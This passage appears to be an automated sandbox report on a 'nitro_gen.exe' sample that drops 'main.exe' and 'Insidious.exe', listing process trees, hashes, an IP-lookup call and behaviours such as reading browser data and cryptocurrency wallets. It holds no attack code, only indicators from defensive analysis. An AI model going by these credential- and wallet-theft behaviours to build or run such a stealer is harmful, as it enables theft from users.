| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\nitro_gen.exe
"C:\Users\Admin\AppData\Local\Temp\nitro_gen.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 104.21.19.200:443 | freegeoip.app | tcp |
Files
memory/1016-59-0x00000000769B1000-0x00000000769B3000-memory.dmp
\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
memory/1816-61-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
C:\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
memory/1924-65-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\Insidious.exe
| MD5 | 5b8d83823531d567241106b9cec66d06 |
| SHA1 | 4a34b951287719ca9558fea764262ec8af52f20d |
| SHA256 | 5a12b229ff508e7ecfecdaf3a52da45ec02160587ccb852646e72b789ada6ac5 |
| SHA512 | c7aceaad5b54a23de1f76691dc12184ae381d3dc7409fc582b30938273a09fb2f6538eef886aca5c871ae9243e4eaf399178e44d3cb47666f025ea31ce6b46fd |
C:\Users\Admin\AppData\Local\Temp\Insidious.exe
| MD5 | 5b8d83823531d567241106b9cec66d06 |
| SHA1 | 4a34b951287719ca9558fea764262ec8af52f20d |
| SHA256 | 5a12b229ff508e7ecfecdaf3a52da45ec02160587ccb852646e72b789ada6ac5 |
| SHA512 | c7aceaad5b54a23de1f76691dc12184ae381d3dc7409fc582b30938273a09fb2f6538eef886aca5c871ae9243e4eaf399178e44d3cb47666f025ea31ce6b46fd |
C:\Users\Admin\AppData\Local\Temp\Insidious.exe
| MD5 | 5b8d83823531d567241106b9cec66d06 |
| SHA1 | 4a34b951287719ca9558fea764262ec8af52f20d |
| SHA256 | 5a12b229ff508e7ecfecdaf3a52da45ec02160587ccb852646e72b789ada6ac5 |
| SHA512 | c7aceaad5b54a23de1f76691dc12184ae381d3dc7409fc582b30938273a09fb2f6538eef886aca5c871ae9243e4eaf399178e44d3cb47666f025ea31ce6b46fd |
memory/1924-69-0x0000000000AB0000-0x0000000000AB1000-memory.dmp
memory/1908-72-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\python38.dll
| MD5 | d2a8a5e7380d5f4716016777818a32c5 |
| SHA1 | fb12f31d1d0758fe3e056875461186056121ed0c |
| SHA256 | 59ab345c565304f638effa7c0236f26041fd06e35041a75988e13995cd28ace9 |
| SHA512 | ad1269d1367f587809e3fbe44af703c464a88fa3b2ae0bf2ad6544b8ed938e4265aab7e308d999e6c8297c0c85c608e3160796325286db3188a3edf040a02ab7 |
C:\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
memory/1924-75-0x000000001A530000-0x000000001A532000-memory.dmp
\Users\Admin\AppData\Local\Temp\_MEI18162\python38.dll
| MD5 | d2a8a5e7380d5f4716016777818a32c5 |
| SHA1 | fb12f31d1d0758fe3e056875461186056121ed0c |
| SHA256 | 59ab345c565304f638effa7c0236f26041fd06e35041a75988e13995cd28ace9 |
| SHA512 | ad1269d1367f587809e3fbe44af703c464a88fa3b2ae0bf2ad6544b8ed938e4265aab7e308d999e6c8297c0c85c608e3160796325286db3188a3edf040a02ab7 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\VCRUNTIME140.dll
| MD5 | 0e675d4a7a5b7ccd69013386793f68eb |
| SHA1 | 6e5821ddd8fea6681bda4448816f39984a33596b |
| SHA256 | bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1 |
| SHA512 | cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66 |
\Users\Admin\AppData\Local\Temp\_MEI18162\VCRUNTIME140.dll
| MD5 | 0e675d4a7a5b7ccd69013386793f68eb |
| SHA1 | 6e5821ddd8fea6681bda4448816f39984a33596b |
| SHA256 | bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1 |
| SHA512 | cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\base_library.zip
| MD5 | 19d34805782c4704d1e2a81fe32e9c27 |
| SHA1 | 8c3d99a0616abc478d6230d07f9dc7b38313813e |
| SHA256 | 06f3c20b42de72e69e9c6b2f66f149f5a65161873e30d07129333f53858d97bb |
| SHA512 | 267b8db8751ea170cd2e04ff5a4d87b0b65edc6d251a8016c213c97bcd8f3a12d955fc25860147b303b153b00d0a41191c09ed24e6fd4b95cb34ae98009456a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_ctypes.pyd
| MD5 | f1e33a8f6f91c2ed93dc5049dd50d7b8 |
| SHA1 | 23c583dc98aa3f6b8b108db5d90e65d3dd72e9b4 |
| SHA256 | 9459d246df7a3c638776305cf3683946ba8db26a7de90df8b60e1be0b27e53c4 |
| SHA512 | 229896da389d78cbdf2168753ed7fcc72d8e0e62c6607a3766d6d47842c0abd519ac4f5d46607b15e7ba785280f9d27b482954e931645337a152b8a54467c6a5 |
\Users\Admin\AppData\Local\Temp\_MEI18162\_ctypes.pyd
| MD5 | f1e33a8f6f91c2ed93dc5049dd50d7b8 |
| SHA1 | 23c583dc98aa3f6b8b108db5d90e65d3dd72e9b4 |
| SHA256 | 9459d246df7a3c638776305cf3683946ba8db26a7de90df8b60e1be0b27e53c4 |
| SHA512 | 229896da389d78cbdf2168753ed7fcc72d8e0e62c6607a3766d6d47842c0abd519ac4f5d46607b15e7ba785280f9d27b482954e931645337a152b8a54467c6a5 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\libffi-7.dll
| MD5 | 4424baf6ed5340df85482fa82b857b03 |
| SHA1 | 181b641bf21c810a486f855864cd4b8967c24c44 |
| SHA256 | 8c1f7f64579d01fedfde07e0906b1f8e607c34d5e6424c87abe431a2322eba79 |
| SHA512 | 8adb94893ada555de2e82f006ab4d571fad8a1b16ac19ca4d2efc1065677f25d2de5c981473fabd0398f6328c1be1ebd4d36668ea67f8a5d25060f1980ee7e33 |
\Users\Admin\AppData\Local\Temp\_MEI18162\libffi-7.dll
| MD5 | 4424baf6ed5340df85482fa82b857b03 |
| SHA1 | 181b641bf21c810a486f855864cd4b8967c24c44 |
| SHA256 | 8c1f7f64579d01fedfde07e0906b1f8e607c34d5e6424c87abe431a2322eba79 |
| SHA512 | 8adb94893ada555de2e82f006ab4d571fad8a1b16ac19ca4d2efc1065677f25d2de5c981473fabd0398f6328c1be1ebd4d36668ea67f8a5d25060f1980ee7e33 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_socket.pyd
| MD5 | d6bae4b430f349ab42553dc738699f0e |
| SHA1 | 7e5efc958e189c117eccef39ec16ebf00e7645a9 |
| SHA256 | 587c4f3092b5f3e34f6b1e927ecc7127b3fe2f7fa84e8a3d0c41828583bd5cef |
| SHA512 | a8f8fed5ea88e8177e291b708e44b763d105907e9f8c9e046c4eebb8684a1778383d1fba6a5fa863ca37c42fd58ed977e9bb3a6b12c5b8d9ab6ef44de75e3d1e |
\Users\Admin\AppData\Local\Temp\_MEI18162\_socket.pyd
| MD5 | d6bae4b430f349ab42553dc738699f0e |
| SHA1 | 7e5efc958e189c117eccef39ec16ebf00e7645a9 |
| SHA256 | 587c4f3092b5f3e34f6b1e927ecc7127b3fe2f7fa84e8a3d0c41828583bd5cef |
| SHA512 | a8f8fed5ea88e8177e291b708e44b763d105907e9f8c9e046c4eebb8684a1778383d1fba6a5fa863ca37c42fd58ed977e9bb3a6b12c5b8d9ab6ef44de75e3d1e |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\select.pyd
| MD5 | 6ae54d103866aad6f58e119d27552131 |
| SHA1 | bc53a92a7667fd922ce29e98dfcf5f08f798a3d2 |
| SHA256 | 63b81af5d3576473c17ac929bea0add5bf8d7ea95c946caf66cbb9ad3f233a88 |
| SHA512 | ff23f3196a10892ea22b28ae929330c8b08ab64909937609b7af7bfb1623cd2f02a041fd9fab24e4bc1754276bdafd02d832c2f642c8ecdcb233f639bdf66dd0 |
\Users\Admin\AppData\Local\Temp\_MEI18162\select.pyd
| MD5 | 6ae54d103866aad6f58e119d27552131 |
| SHA1 | bc53a92a7667fd922ce29e98dfcf5f08f798a3d2 |
| SHA256 | 63b81af5d3576473c17ac929bea0add5bf8d7ea95c946caf66cbb9ad3f233a88 |
| SHA512 | ff23f3196a10892ea22b28ae929330c8b08ab64909937609b7af7bfb1623cd2f02a041fd9fab24e4bc1754276bdafd02d832c2f642c8ecdcb233f639bdf66dd0 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_ssl.pyd
| MD5 | 8ee827f2fe931163f078acdc97107b64 |
| SHA1 | 149bb536f3492bc59bd7071a3da7d1f974860641 |
| SHA256 | eaeefa6722c45e486f48a67ba18b4abb3ff0c29e5b30c23445c29a4d0b1cd3e4 |
| SHA512 | a6d24e72bf620ef695f08f5ffde70ef93f42a3fa60f7c76eb0f521393c595717e05ccb7a61ae216c18fe41e95fb238d82637714cf5208ee8f1dd32ae405b5565 |
\Users\Admin\AppData\Local\Temp\_MEI18162\_ssl.pyd
| MD5 | 8ee827f2fe931163f078acdc97107b64 |
| SHA1 | 149bb536f3492bc59bd7071a3da7d1f974860641 |
| SHA256 | eaeefa6722c45e486f48a67ba18b4abb3ff0c29e5b30c23445c29a4d0b1cd3e4 |
| SHA512 | a6d24e72bf620ef695f08f5ffde70ef93f42a3fa60f7c76eb0f521393c595717e05ccb7a61ae216c18fe41e95fb238d82637714cf5208ee8f1dd32ae405b5565 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\libcrypto-1_1.dll
| MD5 | bf83f8ad60cb9db462ce62c73208a30d |
| SHA1 | f1bc7dbc1e5b00426a51878719196d78981674c4 |
| SHA256 | 012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d |
| SHA512 | ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e |
\Users\Admin\AppData\Local\Temp\_MEI18162\libcrypto-1_1.dll
| MD5 | bf83f8ad60cb9db462ce62c73208a30d |
| SHA1 | f1bc7dbc1e5b00426a51878719196d78981674c4 |
| SHA256 | 012866b68f458ec204b9bce067af8f4a488860774e7e17973c49e583b52b828d |
| SHA512 | ae1bdda1c174ddf4205ab19a25737fe523dca6a9a339030cd8a95674c243d0011121067c007be56def4eaeffc40cbdadfdcbd1e61df3404d6a3921d196dcd81e |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\libssl-1_1.dll
| MD5 | fe1f3632af98e7b7a2799e3973ba03cf |
| SHA1 | 353c7382e2de3ccdd2a4911e9e158e7c78648496 |
| SHA256 | 1ce7ba99e817c1c2d71bc88a1bdd6fcad82aa5c3e519b91ebd56c96f22e3543b |
| SHA512 | a0123dfe324d3ebf68a44afafca7c6f33d918716f29b063c72c4a8bd2006b81faea6848f4f2423778d57296d7bf4f99a3638fc87b37520f0dcbeefa3a2343de0 |
\Users\Admin\AppData\Local\Temp\_MEI18162\libssl-1_1.dll
| MD5 | fe1f3632af98e7b7a2799e3973ba03cf |
| SHA1 | 353c7382e2de3ccdd2a4911e9e158e7c78648496 |
| SHA256 | 1ce7ba99e817c1c2d71bc88a1bdd6fcad82aa5c3e519b91ebd56c96f22e3543b |
| SHA512 | a0123dfe324d3ebf68a44afafca7c6f33d918716f29b063c72c4a8bd2006b81faea6848f4f2423778d57296d7bf4f99a3638fc87b37520f0dcbeefa3a2343de0 |
memory/1096-94-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_hashlib.pyd
| MD5 | a6448bc5e5da21a222de164823add45c |
| SHA1 | 6c26eb949d7eb97d19e42559b2e3713d7629f2f9 |
| SHA256 | 3692fc8e70e6e29910032240080fc8109248ce9a996f0a70d69acf1542fca69a |
| SHA512 | a3833c7e1cf0e4d181ac4de95c5dfa685cf528dc39010bf0ac82864953106213eccff70785021ccb05395b5cf0dcb89404394327cd7e69f820d14dfa6fba8cba |
\Users\Admin\AppData\Local\Temp\_MEI18162\_hashlib.pyd
| MD5 | a6448bc5e5da21a222de164823add45c |
| SHA1 | 6c26eb949d7eb97d19e42559b2e3713d7629f2f9 |
| SHA256 | 3692fc8e70e6e29910032240080fc8109248ce9a996f0a70d69acf1542fca69a |
| SHA512 | a3833c7e1cf0e4d181ac4de95c5dfa685cf528dc39010bf0ac82864953106213eccff70785021ccb05395b5cf0dcb89404394327cd7e69f820d14dfa6fba8cba |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_queue.pyd
| MD5 | 44b72e0ad8d1e1ec3d8722088b48c3c5 |
| SHA1 | e0f41bf85978dd8f5abb0112c26322b72c0d7770 |
| SHA256 | 4aa1bbde1621c49edab4376cf9a13c1aa00a9b0a9905d9640a2694ef92f77d5e |
| SHA512 | 05853f93c6d79d8f9c96519ce4c195b9204df1255b01329deaa65e29bd3e988d41454cd305e2199404f587e855737879c330638f2f07bff11388a49e67ba896c |
\Users\Admin\AppData\Local\Temp\_MEI18162\_queue.pyd
| MD5 | 44b72e0ad8d1e1ec3d8722088b48c3c5 |
| SHA1 | e0f41bf85978dd8f5abb0112c26322b72c0d7770 |
| SHA256 | 4aa1bbde1621c49edab4376cf9a13c1aa00a9b0a9905d9640a2694ef92f77d5e |
| SHA512 | 05853f93c6d79d8f9c96519ce4c195b9204df1255b01329deaa65e29bd3e988d41454cd305e2199404f587e855737879c330638f2f07bff11388a49e67ba896c |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_bz2.pyd
| MD5 | 3dc8af67e6ee06af9eec52fe985a7633 |
| SHA1 | 1451b8c598348a0c0e50afc0ec91513c46fe3af6 |
| SHA256 | c55821f5fdb0064c796b2c0b03b51971f073140bc210cbe6ed90387db2bed929 |
| SHA512 | da16bfbc66c8abc078278d4d3ce1595a54c9ef43ae8837ceb35ae2f4757b930fe55e258827036eba8218315c10af5928e30cb22c60ff69159c8fe76327280087 |
\Users\Admin\AppData\Local\Temp\_MEI18162\_bz2.pyd
| MD5 | 3dc8af67e6ee06af9eec52fe985a7633 |
| SHA1 | 1451b8c598348a0c0e50afc0ec91513c46fe3af6 |
| SHA256 | c55821f5fdb0064c796b2c0b03b51971f073140bc210cbe6ed90387db2bed929 |
| SHA512 | da16bfbc66c8abc078278d4d3ce1595a54c9ef43ae8837ceb35ae2f4757b930fe55e258827036eba8218315c10af5928e30cb22c60ff69159c8fe76327280087 |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\_lzma.pyd
| MD5 | 37057c92f50391d0751f2c1d7ad25b02 |
| SHA1 | a43c6835b11621663fa251da421be58d143d2afb |
| SHA256 | 9442dc46829485670a6ac0c02ef83c54b401f1570d1d5d1d85c19c1587487764 |
| SHA512 | 953dc856ad00c3aec6aeab3afa2deb24211b5b791c184598a2573b444761db2d4d770b8b807ebba00ee18725ff83157ec5fa2e3591a7756eb718eba282491c7c |
\Users\Admin\AppData\Local\Temp\_MEI18162\_lzma.pyd
| MD5 | 37057c92f50391d0751f2c1d7ad25b02 |
| SHA1 | a43c6835b11621663fa251da421be58d143d2afb |
| SHA256 | 9442dc46829485670a6ac0c02ef83c54b401f1570d1d5d1d85c19c1587487764 |
| SHA512 | 953dc856ad00c3aec6aeab3afa2deb24211b5b791c184598a2573b444761db2d4d770b8b807ebba00ee18725ff83157ec5fa2e3591a7756eb718eba282491c7c |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\certifi\cacert.pem
| MD5 | 1ba3b44f73a6b25711063ea5232f4883 |
| SHA1 | 1b1a84804f896b7085924f8bf0431721f3b5bdbe |
| SHA256 | bb77f13d3fbec9e98bbf28ac95046b44196c7d8f55ab7720061e99991a829197 |
| SHA512 | 0dd2a14331308b1de757d56fab43678431e0ad6f5f5b12c32fa515d142bd955f8be690b724e07f41951dd03c9fee00e604f4e0b9309da3ea438c8e9b56ca581b |
C:\Users\Admin\AppData\Local\Temp\_MEI18162\unicodedata.pyd
| MD5 | 4c0d43f1a31e76255cb592bb616683e7 |
| SHA1 | 0a9f3d77a6e064baebacacc780701117f09169ad |
| SHA256 | 0f84e9f0d0bf44d10527a9816fcab495e3d797b09e7bbd1e6bd666ceb4b6c1a8 |
| SHA512 | b8176a180a441fe402e86f055aa5503356e7f49e984d70ab1060dee4f5f17fcec9c01f75bbff75ce5f4ef212677a6525804be53646cc0d7817b6ed5fd83fd778 |
\Users\Admin\AppData\Local\Temp\_MEI18162\unicodedata.pyd
| MD5 | 4c0d43f1a31e76255cb592bb616683e7 |
| SHA1 | 0a9f3d77a6e064baebacacc780701117f09169ad |
| SHA256 | 0f84e9f0d0bf44d10527a9816fcab495e3d797b09e7bbd1e6bd666ceb4b6c1a8 |
| SHA512 | b8176a180a441fe402e86f055aa5503356e7f49e984d70ab1060dee4f5f17fcec9c01f75bbff75ce5f4ef212677a6525804be53646cc0d7817b6ed5fd83fd778 |
memory/1520-106-0x0000000000000000-mapping.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2021-08-11 12:52
Reported
2021-08-11 12:55
Platform
win10v20210410
Max time kernel
17s
Max time network
120s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Insidious.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\nitro_gen.exe
"C:\Users\Admin\AppData\Local\Temp\nitro_gen.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\Insidious.exe
"C:\Users\Admin\AppData\Local\Temp\Insidious.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | freegeoip.app | udp |
| N/A | 104.21.19.200:443 | freegeoip.app | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
memory/1916-116-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Insidious.exe
| MD5 | 5b8d83823531d567241106b9cec66d06 |
| SHA1 | 4a34b951287719ca9558fea764262ec8af52f20d |
| SHA256 | 5a12b229ff508e7ecfecdaf3a52da45ec02160587ccb852646e72b789ada6ac5 |
| SHA512 | c7aceaad5b54a23de1f76691dc12184ae381d3dc7409fc582b30938273a09fb2f6538eef886aca5c871ae9243e4eaf399178e44d3cb47666f025ea31ce6b46fd |
memory/1776-114-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\Insidious.exe
| MD5 | 5b8d83823531d567241106b9cec66d06 |
| SHA1 | 4a34b951287719ca9558fea764262ec8af52f20d |
| SHA256 | 5a12b229ff508e7ecfecdaf3a52da45ec02160587ccb852646e72b789ada6ac5 |
| SHA512 | c7aceaad5b54a23de1f76691dc12184ae381d3dc7409fc582b30938273a09fb2f6538eef886aca5c871ae9243e4eaf399178e44d3cb47666f025ea31ce6b46fd |
memory/1916-119-0x0000000000C90000-0x0000000000C91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
memory/2888-122-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\main.exe
| MD5 | 53476f1737d178939ad93e38465fddd6 |
| SHA1 | 5c8dde18b9d4b5d8c72de85d5f613dbfd77fe5b2 |
| SHA256 | b2b71248264c08ba56ed8d39f72e6811fea58d110bcae39381e18bf3fd387d43 |
| SHA512 | d01aa9891808b20cb891d816affca0eaac1ba2e8d768d03d56a03eb1e1905de93a9fc9960d098150c53dcc5abde36c0fd0754a4725e554b95ee13e5e90b4bee3 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\python38.dll
| MD5 | d2a8a5e7380d5f4716016777818a32c5 |
| SHA1 | fb12f31d1d0758fe3e056875461186056121ed0c |
| SHA256 | 59ab345c565304f638effa7c0236f26041fd06e35041a75988e13995cd28ace9 |
| SHA512 | ad1269d1367f587809e3fbe44af703c464a88fa3b2ae0bf2ad6544b8ed938e4265aab7e308d999e6c8297c0c85c608e3160796325286db3188a3edf040a02ab7 |
memory/1916-125-0x000000001B990000-0x000000001B992000-memory.dmp
\Users\Admin\AppData\Local\Temp\_MEI17762\VCRUNTIME140.dll
| MD5 | 0e675d4a7a5b7ccd69013386793f68eb |
| SHA1 | 6e5821ddd8fea6681bda4448816f39984a33596b |
| SHA256 | bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1 |
| SHA512 | cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66 |
C:\Users\Admin\AppData\Local\Temp\_MEI17762\VCRUNTIME140.dll
| MD5 | 0e675d4a7a5b7ccd69013386793f68eb |
| SHA1 | 6e5821ddd8fea6681bda4448816f39984a33596b |
| SHA256 | bf5ff4603557c9959acec995653d052d9054ad4826df967974efd2f377c723d1 |
| SHA512 | cae69a90f92936febde67dacd6ce77647cb3b3ed82bb66463cd9047e90723f633aa2fc365489de09fecdc510be15808c183b12e6236b0893af19633f6a670e66 |
\Users\Admin\AppData\Local\Temp\_MEI17762\python38.dll
| MD5 | d2a8a5e7380d5f4716016777818a32c5 |
| SHA1 | fb12f31d1d0758fe3e056875461186056121ed0c |
| SHA256 | 59ab345c565304f638effa7c0236f26041fd06e35041a75988e13995cd28ace9 |
| SHA512 | ad1269d1367f587809e3fbe44af703c464a88fa3b2ae0bf2ad6544b8ed938e4265aab7e308d999e6c8297c0c85c608e3160796325286db3188a3edf040a02ab7 |
